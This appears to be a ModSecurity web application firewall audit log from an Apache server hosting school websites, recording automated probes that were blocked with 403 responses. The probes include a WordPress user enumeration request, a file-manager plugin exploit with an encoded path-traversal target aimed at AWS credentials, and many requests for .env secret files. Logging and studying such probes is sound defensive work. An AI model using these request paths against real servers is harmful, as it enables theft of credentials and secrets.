https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.202.254.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.202.254.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6555552d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6555552d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748074071999021 2943 (- - -) Stopwatch2: 1748074071999021 2943; combined=1303, p1=452, p2=821, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6555552d-Z-- --1914a218-A-- [24/May/2025:15:09:02 +0700] aDF-nuO2UzDOKMmK0i6jbwAAAAs 103.236.140.4 52046 103.236.140.4 8181 --1914a218-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=file&target=l1_Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL3Jvb3QvLmF3cy9jcmVkZW50aWFscw== HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644029 --1914a218-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1914a218-E-- --1914a218-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748074142042905 4277 (- - -) Stopwatch2: 1748074142042905 4277; combined=2566, p1=484, p2=2048, p3=0, p4=0, p5=33, sr=77, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1914a218-Z-- --724d6c24-A-- [24/May/2025:15:09:18 +0700] aDF-ruO2UzDOKMmK0i6jeQAAABU 103.236.140.4 52046 103.236.140.4 8181 --724d6c24-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644045 --724d6c24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --724d6c24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074158605058 666 (- - -) Stopwatch2: 1748074158605058 666; combined=298, p1=263, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --724d6c24-Z-- --f08e916c-A-- [24/May/2025:15:09:19 +0700] aDF-rzvI5DIWBJ2mFG5LXwAAAMM 103.236.140.4 52086 103.236.140.4 8181 --f08e916c-B-- GET /.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029869 --f08e916c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f08e916c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074159835128 683 (- - -) Stopwatch2: 1748074159835128 683; combined=276, p1=240, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f08e916c-Z-- --396e5e5c-A-- [24/May/2025:15:09:21 +0700] aDF-sTvI5DIWBJ2mFG5LYAAAAMc 103.236.140.4 52090 103.236.140.4 8181 --396e5e5c-B-- GET /.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644048 --396e5e5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --396e5e5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074161071000 666 (- - -) Stopwatch2: 1748074161071000 666; combined=248, p1=218, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --396e5e5c-Z-- --96094f0d-A-- [24/May/2025:15:09:23 +0700] aDF-s_mzt4abyoi_U9n_EgAAAIU 103.236.140.4 52094 103.236.140.4 8181 --96094f0d-B-- GET /wp-content/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644051 --96094f0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --96094f0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074163640211 626 (- - -) Stopwatch2: 1748074163640211 626; combined=294, p1=260, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96094f0d-Z-- --1c2cd122-A-- [24/May/2025:15:09:25 +0700] aDF-tDvI5DIWBJ2mFG5LYQAAAM8 103.236.140.4 52102 103.236.140.4 8181 --1c2cd122-B-- GET /application/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029875 --1c2cd122-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1c2cd122-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074164986517 13849 (- - -) Stopwatch2: 1748074164986517 13849; combined=26574, p1=238, p2=0, p3=0, p4=0, p5=13185, sr=65, sw=0, l=0, gc=13151 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c2cd122-Z-- --f53b8a2e-A-- [24/May/2025:15:09:26 +0700] aDF-tvmzt4abyoi_U9n_EwAAAJI 103.236.140.4 52106 103.236.140.4 8181 --f53b8a2e-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644054 --f53b8a2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f53b8a2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074166294651 752 (- - -) Stopwatch2: 1748074166294651 752; combined=304, p1=267, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f53b8a2e-Z-- --67bc6751-A-- [24/May/2025:15:09:27 +0700] aDF-t-O2UzDOKMmK0i6jegAAABA 103.236.140.4 52110 103.236.140.4 8181 --67bc6751-B-- GET /config/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029878 --67bc6751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --67bc6751-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074167836396 835 (- - -) Stopwatch2: 1748074167836396 835; combined=313, p1=271, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67bc6751-Z-- --48caff7e-A-- [24/May/2025:15:09:29 +0700] aDF-ueO2UzDOKMmK0i6jfAAAAAE 103.236.140.4 52116 103.236.140.4 8181 --48caff7e-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644057 --48caff7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48caff7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074169280109 663 (- - -) Stopwatch2: 1748074169280109 663; combined=274, p1=247, p2=0, p3=0, p4=0, p5=27, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48caff7e-Z-- --538ff573-A-- [24/May/2025:15:09:31 +0700] aDF-u-O2UzDOKMmK0i6jfgAAAAw 103.236.140.4 52120 103.236.140.4 8181 --538ff573-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644060 --538ff573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --538ff573-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074171930897 611 (- - -) Stopwatch2: 1748074171930897 611; combined=256, p1=229, p2=0, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --538ff573-Z-- --0009917a-A-- [24/May/2025:15:09:33 +0700] aDF-vfmzt4abyoi_U9n_FQAAAJc 103.236.140.4 52128 103.236.140.4 8181 --0009917a-B-- GET /library/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029884 --0009917a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0009917a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074173225516 638 (- - -) Stopwatch2: 1748074173225516 638; combined=249, p1=217, p2=0, p3=0, p4=0, p5=31, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0009917a-Z-- --31f2912b-A-- [24/May/2025:15:09:34 +0700] aDF-vuO2UzDOKMmK0i6jfwAAAAg 103.236.140.4 52132 103.236.140.4 8181 --31f2912b-B-- GET /nextjs-app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644063 --31f2912b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --31f2912b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074174568893 721 (- - -) Stopwatch2: 1748074174568893 721; combined=277, p1=236, p2=0, p3=0, p4=0, p5=41, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31f2912b-Z-- --64639928-A-- [24/May/2025:15:09:36 +0700] aDF-wOO2UzDOKMmK0i6jgAAAABE 103.236.140.4 52136 103.236.140.4 8181 --64639928-B-- GET /node-api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029887 --64639928-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --64639928-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074176062355 795 (- - -) Stopwatch2: 1748074176062355 795; combined=294, p1=257, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64639928-Z-- --2cf50848-A-- [24/May/2025:15:09:37 +0700] aDF-weO2UzDOKMmK0i6jgQAAAAs 103.236.140.4 52140 103.236.140.4 8181 --2cf50848-B-- GET /vendor/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644066 --2cf50848-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2cf50848-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074177475801 816 (- - -) Stopwatch2: 1748074177475801 816; combined=312, p1=270, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2cf50848-Z-- --ad87c74d-A-- [24/May/2025:15:09:42 +0700] aDF-xuO2UzDOKMmK0i6jgwAAAA0 103.236.140.4 52144 103.236.140.4 8181 --ad87c74d-B-- GET /backend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644069 --ad87c74d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad87c74d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074182150919 720 (- - -) Stopwatch2: 1748074182150919 720; combined=316, p1=268, p2=0, p3=0, p4=0, p5=48, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad87c74d-Z-- --c79b6966-A-- [24/May/2025:15:09:45 +0700] aDF-yeO2UzDOKMmK0i6jhQAAAAU 103.236.140.4 52150 103.236.140.4 8181 --c79b6966-B-- GET /myproject/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644072 --c79b6966-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c79b6966-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074185068286 573 (- - -) Stopwatch2: 1748074185068286 573; combined=268, p1=233, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c79b6966-Z-- --5645e442-A-- [24/May/2025:15:09:46 +0700] aDF-yuO2UzDOKMmK0i6jhgAAABc 103.236.140.4 52156 103.236.140.4 8181 --5645e442-B-- GET /.envs/.production/.django HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029896 --5645e442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5645e442-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074186372370 711 (- - -) Stopwatch2: 1748074186372370 711; combined=272, p1=237, p2=0, p3=0, p4=0, p5=34, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5645e442-Z-- --2a0db700-A-- [24/May/2025:15:09:47 +0700] aDF-y-O2UzDOKMmK0i6jhwAAABU 103.236.140.4 52160 103.236.140.4 8181 --2a0db700-B-- GET /react-app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644075 --2a0db700-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2a0db700-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074187734913 451 (- - -) Stopwatch2: 1748074187734913 451; combined=152, p1=135, p2=0, p3=0, p4=0, p5=16, sr=41, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a0db700-Z-- --ef710c47-A-- [24/May/2025:15:09:49 +0700] aDF-zeO2UzDOKMmK0i6jiAAAABA 103.236.140.4 52164 103.236.140.4 8181 --ef710c47-B-- GET /react-app/.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029899 --ef710c47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ef710c47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: 